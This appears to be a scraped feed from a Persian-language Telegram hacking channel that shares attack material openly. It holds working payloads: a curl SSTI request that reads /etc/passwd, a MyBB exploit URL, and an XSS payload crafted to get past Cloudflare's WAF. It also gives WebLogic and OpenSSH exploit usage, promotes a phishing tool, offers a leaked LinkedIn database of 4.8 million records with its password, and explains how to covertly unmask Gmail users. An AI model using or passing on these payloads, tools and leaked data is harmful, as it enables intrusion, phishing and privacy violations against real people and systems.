SSTI to RCE:
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍1
بزنید حال کنین
——————
0Day.Today
@LearnExploit
@Tech_Army
vmess://ewogICJ2IjogIjIiLAogICJwcyI6ICJATGVhcm5leHBsb2l0IiwKICAiYWRkIjogIjU0LjM4Ljk5LjI1MyIsCiAgInBvcnQiOiAzNjg4MSwKICAiaWQiOiAiM2I5MzJmYjYtYmU4ZS00NjM0LTk5MDUtMjNjNTVkZTM2NWZjIiwKICAiYWlkIjogMCwKICAibmV0IjogIndzIiwKICAidHlwZSI6ICJub25lIiwKICAiaG9zdCI6ICIiLAogICJwYXRoIjogIi8iLAogICJ0bHMiOiAibm9uZSIKfQ==
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5
Weblogic-CVE-2023-21839
نسخه های آسیب پذیر :
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Github
Usage :
——————
0Day.Today
@LearnExploit
@Tech_Army
نسخه های آسیب پذیر :
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Github
Usage :
java -jar target ip: port ldap address
#CVE ——————
0Day.Today
@LearnExploit
@Tech_Army
✍3⚡1👍1👨💻1
Linkedin_sql.7z
123.2 MB
4.8M LinkedIn Profile Company Details With Below Data
——————
0Day.Today
@LearnExploit
@Tech_Army
id , company_url_domain , company_name , country , industry , linkedin_url , total_employee_estimate , year_foundedPassword:
weleakdatabase
#linkedin #leak——————
0Day.Today
@LearnExploit
@Tech_Army
👍2🔥2❤1❤🔥1
چطوری میتونیم اسم شخص پشت آدرس جیمیل رو بدون اطلاع تارگت پیدا کنیم ؟
➕ یه فایل با Google Docs بسازید .
➕ فایلتون رو با جیمیل تارگت Share کنید .
➕ تیک گزینه Notify people رو بردارید .
➕ تمام .
#Osint #gmail
——————
0Day.Today
@LearnExploit
@Tech_Army
➕ یه فایل با Google Docs بسازید .
➕ فایلتون رو با جیمیل تارگت Share کنید .
➕ تیک گزینه Notify people رو بردارید .
➕ تمام .
#Osint #gmail
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6🫡5
Exploits bank of NMAP program
🔗 Link
#Nmap #Vuln #Exploit
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Nmap #Vuln #Exploit
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
MyBB Exploit
#mybb #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
/index.php?_COOKIE=%C3%A2%E2%82%AC%C5%A0
#mybb #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
✍1👍1👎1
This media is not supported in your browser
VIEW IN TELEGRAM
PyPhisher
📝
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.
😸 Github
#Python #Linux #PyPhisher
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.
#Python #Linux #PyPhisher
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
CVE-2023-25136
OpenSSH 9.1 vulnerability mass scan and exploit
Github
#CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
OpenSSH 9.1 vulnerability mass scan and exploit
Github
#CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👎3⚡1
[ Bypass Cloudflare ] Open Redirect to XSS
Open Redirect :
Escalate to XSS :
Final payload to bypass the WAF :
#bypass #cloudflare #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Open Redirect :
/login?redirectUrl=//evil,org
--> redirect to evil,orgEscalate to XSS :
/login?redirectUrl=javascript:alert(1)
--> blocked by WAFFinal payload to bypass the WAF :
/login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
--> xss pop-up#bypass #cloudflare #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
✍5👍3🔥1
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Bypass 403 (Forbidden) Methodology
6 usefull Trick for bypass the Forbidden admin page...
...::: X P 4 :::...
➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
6 usefull Trick for bypass the Forbidden admin page...
...::: X P 4 :::...
➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
👍10